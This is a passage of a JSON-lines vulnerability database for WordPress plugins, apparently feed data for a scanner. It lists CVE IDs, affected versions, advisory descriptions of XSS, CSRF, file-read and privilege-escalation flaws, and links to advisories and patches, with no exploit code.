name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8d399f3-5517-4c5d-b792-94eb8b0cc0f4?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-0433","slug":"master-addons","versionImpact":"2.0.7.1","versionEndExcluding":"2.0.7.2","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 2.0.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-hover-effects\\\/ma-image-hover-effects.php#L1117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-hover-effects\\\/ma-image-hover-effects.php#L1117\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tabs\\\/ma-tabs.php#L568\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tabs\\\/ma-tabs.php#L568\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243199\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243199\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c693831f-fe60-4548-83aa-4ebd03d134ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c693831f-fe60-4548-83aa-4ebd03d134ec?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2023-47526","slug":"chart-builder","versionEndExcluding":"2.0.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chart Builder Team Chartify \u2013 WordPress Chart Plugin allows Stored XSS.This issue affects Chartify \u2013 WordPress Chart Plugin: from n\/a through 2.0.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chart-builder\\\/wordpress-chartify-plugin-2-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chart-builder\\\/wordpress-chartify-plugin-2-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0328","slug":"insert-headers-and-footers","versionEndExcluding":"2.0.7","description":"The WPCode WordPress plugin before 2.0.7 does not have adequate privilege checks in place for several AJAX actions, only checking the nonce. This may lead to allowing any authenticated user who can edit posts to call the endpoints related to WPCode Library authentication (such as update and delete the auth key).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c4318a9-a3c5-409b-a52e-edd8583c3c43\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c4318a9-a3c5-409b-a52e-edd8583c3c43\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25149","slug":"gallery-images-ape","versionEndExcluding":"2.0.7","description":"The Gallery Images Ape plugin for WordPress is vulnerable to Arbitrary Plugin Deactivation in versions up to, and including, 2.0.6. This allows authenticated attackers with any capability level to deactivate any plugin on the site, including plugins necessary to site functionality or security.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ape-gallery-plugin-fixed-authenticated-arbitrary-plugin-deactivation-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ape-gallery-plugin-fixed-authenticated-arbitrary-plugin-deactivation-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd6c2b8-b00c-49d1-930f-50397e742ac5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd6c2b8-b00c-49d1-930f-50397e742ac5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4332","slug":"the-plus-addons-for-elementor-page-builder","versionEndExcluding":"2.0.7","description":"The Plus Addons for Elementor plugin for WordPress is vulnerable to arbitrary file reads in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin has a feature to add an \"Info Box\" to an Elementor created page. This Info Box can include an SVG image for the box. Unfortunately, the plugin used file_get_contents with no verification that the file being supplied was an SVG file, so any user with access to the Elementor page builder, such as contributors, could read arbitrary files on the WordPress installation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2523506%40the-plus-addons-for-elementor-page-builder&new=2523506%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2523506%40the-plus-addons-for-elementor-page-builder&new=2523506%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa698e7e-b1c7-4ead-aa2e-7fbfc9dfac80\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa698e7e-b1c7-4ead-aa2e-7fbfc9dfac80\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4331","slug":"the-plus-addons-for-elementor-page-builder","versionEndExcluding":"2.0.7","description":"The Plus Addons for Elementor plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin adds a registration form to the Elementor page builders functionality. As part of the registration form, users can choose which role to set as the default for users upon registration. This field is not hidden for lower-level users so any user with access to the Elementor page builder, such as contributors, can set the default role to administrator. Since contributors can not publish posts, only author+ users can elevate privileges without interaction via a site administrator (to approve a post).","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96388c82-2392-42b3-b0a0-c3d92910fb5c\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96388c82-2392-42b3-b0a0-c3d92910fb5c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2514618%40the-plus-addons-for-elementor-page-builder&new=2514618%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2514618%40the-plus-addons-for-elementor-page-builder&new=2514618%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1108","slug":"plugin-groups","versionImpact":"2.0.6","versionEndExcluding":"2.0.7","description":"The Plugin Groups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_init() function in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to change the settings of the plugin, which can also cause a denial of service due to a misconfiguration.","recommendation":"Update to version 2.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8298f1fb-3165-40e3-9192-805a07c14cae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8298f1fb-3165-40e3-9192-805a07c14cae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036754\\\/plugin-groups\\\/trunk\\\/classes\\\/class-plugin-groups.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036754\\\/plugin-groups\\\/trunk\\\/classes\\\/class-plugin-groups.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4443","slug":"quadmenu","versionImpact":"2.0.6","versionEndExcluding":"2.0.7","description":"The WordPress Mega Menu plugin for WordPress is vulnerable to Arbitrary File Creation in versions up to, and including, 2.0.6 via the compiler_save AJAX action. This makes it possible for unauthenticated attackers to create arbitrary PHP files that can be used to execute malicious code.","recommendation":"Update to version 2.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04003542-fd62-4587-9834-70e7fe8f08ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04003542-fd62-4587-9834-70e7fe8f08ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/sh3llcon.org\\\/la-debilidad-de-wordpress\\\/\",\"name\":\"https:\\\/\\\/sh3llcon.org\\\/la-debilidad-de-wordpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-wordpress-mega-menu-quadmenu-remote-code-execution-2-0-6\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-wordpress-mega-menu-quadmenu-remote-code-execution-2-0-6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13901","slug":"counter-box","versionImpact":"2.0.6","versionEndExcluding":"2.0.7","description":"The Counter Box: Add Engaging Countdowns, Timers & Counters to Your WordPress Site plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/counter-box\\\/trunk\\\/admin\\\/assets\\\/js\\\/5.builder.js#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/counter-box\\\/trunk\\\/admin\\\/assets\\\/js\\\/5.builder.js#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247696\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247696\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/251b17a7-781f-4f17-af90-9a6fbae69243?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/251b17a7-781f-4f17-af90-9a6fbae69243?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10045","slug":"transients-manager","versionImpact":"2.0.6","versionEndExcluding":"2.0.7","description":"The Transients Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on the process_actions function. This makes it possible for unauthenticated attackers to delete transients via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b8b5a2-979d-42d0-86f5-48ee73162d22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b8b5a2-979d-42d0-86f5-48ee73162d22?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/transients-manager\\\/trunk\\\/src\\\/TransientsManager.php#L993\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/transients-manager\\\/trunk\\\/src\\\/TransientsManager.php#L993\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171619\\\/transients-manager\\\/trunk\\\/src\\\/TransientsManager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171619\\\/transients-manager\\\/trunk\\\/src\\\/TransientsManager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4399","slug":"edwiser-bridge","versionEndExcluding":"2.0.7","description":"The Edwiser Bridge plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including,2.0.6. This is due to missing or incorrect nonce validation on the user_data_synchronization_initiater(), course_synchronization_initiater(), users_link_to_moodle_synchronization(), connection_test_initiater(), admin_menus(), and subscribe_handler() function. This makes it possible for unauthenticated attackers to perform unauthorized actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2478642%40edwiser-bridge&new=2478642%40edwiser-bridge&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2478642%40edwiser-bridge&new=2478642%40edwiser-bridge&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6450dafd-5992-4831-87af-e5e47cc8663e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6450dafd-5992-4831-87af-e5e47cc8663e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7082","slug":"easy-table-of-contents","versionImpact":"2.0.67.1","versionEndExcluding":"2.0.68","description":"The Easy Table of Contents WordPress plugin before 2.0.68 does not sanitise and escape some parameters, which could allow users with a role as low as Editor to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.0.68, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30e685-00fa-4dbb-b516-2d14e4b13697\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30e685-00fa-4dbb-b516-2d14e4b13697\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6334","slug":"easy-table-of-contents","versionImpact":"2.0.67","versionEndExcluding":"2.0.67.1","description":"The Easy Table of Contents WordPress plugin before 2.0.67.1 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 2.0.67.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c09083c-6960-4369-8c5c-ad20e34aaa8b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c09083c-6960-4369-8c5c-ad20e34aaa8b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5573","slug":"easy-table-of-contents","versionImpact":"2.0.65","versionEndExcluding":"2.0.66","description":"The Easy Table of Contents WordPress plugin before 2.0.66 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.0.66, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b01044b-355f-40d3-8e11-23a890f98c76\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b01044b-355f-40d3-8e11-23a890f98c76\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12513","slug":"contests-from-rewards-fuel","versionImpact":"2.0.65","versionEndExcluding":"2.0.66","description":"The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'RF_CONTEST' shortcode in all versions up to, and including, 2.0.65 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.66, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208765%40contests-from-rewards-fuel&new=3208765%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208765%40contests-from-rewards-fuel&new=3208765%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c89934b1-5e3c-4bf2-8d36-17c4268ccd4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c89934b1-5e3c-4bf2-8d36-17c4268ccd4e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1787","slug":"contests-from-rewards-fuel","versionImpact":"2.0.64","versionEndExcluding":"2.0.65","description":"The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'update_rewards_fuel_api_key' parameter in all versions up to, and including, 2.0.64 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.65, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9eeec949-e440-4df3-8c26-db92498cada3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9eeec949-e440-4df3-8c26-db92498cada3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051990%40contests-from-rewards-fuel&new=3051990%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051990%40contests-from-rewards-fuel&new=3051990%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1785","slug":"contests-from-rewards-fuel","versionImpact":"2.0.62","versionEndExcluding":"2.0.63","description":"The Contests by Rewards Fuel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.62. This is due to missing or incorrect nonce validation on the ajax_handler() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site's user with the edit_posts capability into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.63, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689f3667-2dda-40a8-8627-d38c6c6816fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689f3667-2dda-40a8-8627-d38c6c6816fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3039978%40contests-from-rewards-fuel&new=3039978%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3039978%40contests-from-rewards-fuel&new=3039978%40contests-from-rewards-fuel&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6282","slug":"master-addons","versionImpact":"2.0.6.4","versionEndExcluding":"2.0.6.5","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-jltma-wrapper-link element in all versions up to, and including 2.0.6.4 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks on the injected link.","recommendation":"Update to version 2.0.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/tags\\\/2.0.6.2\\\/assets\\\/js\\\/master-addons-scripts.js#L3398\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/tags\\\/2.0.6.2\\\/assets\\\/js\\\/master-addons-scripts.js#L3398\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146230\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146230\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5542","slug":"master-addons","versionImpact":"2.0.6.1","versionEndExcluding":"2.0.6.2","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Navigation Menu widget of the plugin's Mega Menu extension in all versions up to, and including, 2.0.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5151f429-b1f3-43d4-94cf-3ff382b80190?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5151f429-b1f3-43d4-94cf-3ff382b80190?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096299\\\/master-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096299\\\/master-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5382","slug":"master-addons","versionImpact":"2.0.6.1","versionEndExcluding":"2.0.6.2","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ma-template' REST API route in all versions up to, and including, 2.0.6.1. This makes it possible for unauthenticated attackers to create or modify existing Master Addons templates or make settings modifications related to these templates.","recommendation":"Update to version 2.0.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3820f80-9b80-4672-b2ff-3864793d2de2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3820f80-9b80-4672-b2ff-3864793d2de2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096299\\\/master-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096299\\\/master-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4580","slug":"master-addons","versionImpact":"2.0.6.0","versionEndExcluding":"2.0.6.1","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in versions up to, and including, 2.0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e3ac84-dd82-42b0-80b9-c876731170d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e3ac84-dd82-42b0-80b9-c876731170d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-hover-effects\\\/ma-image-hover-effects.php#L1546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-hover-effects\\\/ma-image-hover-effects.php#L1546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tabs\\\/ma-tabs.php#L1068\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tabs\\\/ma-tabs.php#L1068\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087193\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087193\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
